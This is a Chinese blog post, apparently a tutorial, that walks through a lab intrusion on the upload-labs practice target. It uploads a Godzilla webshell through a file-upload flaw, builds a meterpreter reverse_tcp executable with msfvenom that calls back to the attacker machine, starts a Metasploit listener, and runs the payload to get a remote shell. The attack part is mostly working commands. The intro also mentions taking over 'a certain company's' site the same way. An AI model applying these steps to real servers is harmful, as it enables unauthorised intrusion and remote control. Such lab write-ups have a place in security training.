通过web站点使用上传webshell的方式获取meterpreter权限

前言:
这几天做渗透成功通过任意文件上传漏洞拿下了某公司的webshell
但一般通过上传webshell拿到的权限不是很高,所以要进行提权操作。

环境:
靶机地址:192.168.71.132 搭建了upload-labs-maste,用uplod靶机作为目标进行渗透
攻击机地址:192.168.71.141(kali)
物理机地址:略

操作:
先在upload-labs-maste上传webshell,使用一句话木马即可。

(嘿嘿,upload-labs-maste第一关简单上传webshell不用发出来吧,直接发结果就好了)
在这里插入图片描述
用的是哥斯拉的马子,现在已经上传成功了,让我们用哥斯拉连接一下
在这里插入图片描述
我们的webshell已经成功了,那么让我们来试一下提权。

在kali中创建后门木马shell.exe,拖至物理机

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.71.141 lport=8881 -f exe -o shell.exe

在这里插入图片描述

开启监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
showo ptions
set lhost 192.168.71.141
set lport 8881
run

在这里插入图片描述
返回哥斯拉,点击上传文件,上传shell.exe
在这里插入图片描述可以看到外面的文件已经上传到了靶机上了

执行shell.exe

start shell.exe

在这里插入图片描述
返回kali,已成功获取meterpreter权限

在这里插入图片描述

最后附上meterpreter提权的命令大全:
传送门

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值